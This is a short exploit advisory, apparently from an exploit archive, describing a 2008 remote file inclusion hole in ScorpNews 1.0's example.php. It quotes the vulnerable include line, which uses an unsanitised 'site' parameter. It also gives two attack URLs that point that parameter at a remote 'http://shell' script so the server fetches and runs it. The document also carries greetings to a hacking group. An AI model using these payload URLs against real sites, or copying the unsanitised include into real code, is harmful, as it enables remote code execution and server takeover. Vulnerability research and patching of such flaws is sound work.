ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability
# Published : 2008-05-04
# Author : Silver
# Previous Title : cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities
# Next Title : Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit

########################################################################
#
# /news/example.php <= Remote File Inclusion
#
# Found By: Silver - x.56[@]hotmail[d0t]de
#
# Website: www.silver-crystal-war.6x.to
#
# Version: S C O R P N E W S Version 2
#
# Location: Germany
#
########################################################################
#
#file ;
#
#example.php
#
#<? include $site.'.php';?>
#
#########################################################################
#
#example Exploit ;
#
#http://www.example.com/example.php?site=http://shell
#
#http://www.example.com/news/example.php?site=http://shell
# 
########################################################################
#
#Greetz to;
#
# .:National Security Team:. (www.crystal-war.6x.to)
#
########################################################################

# www.Syue.com [2008-05-04]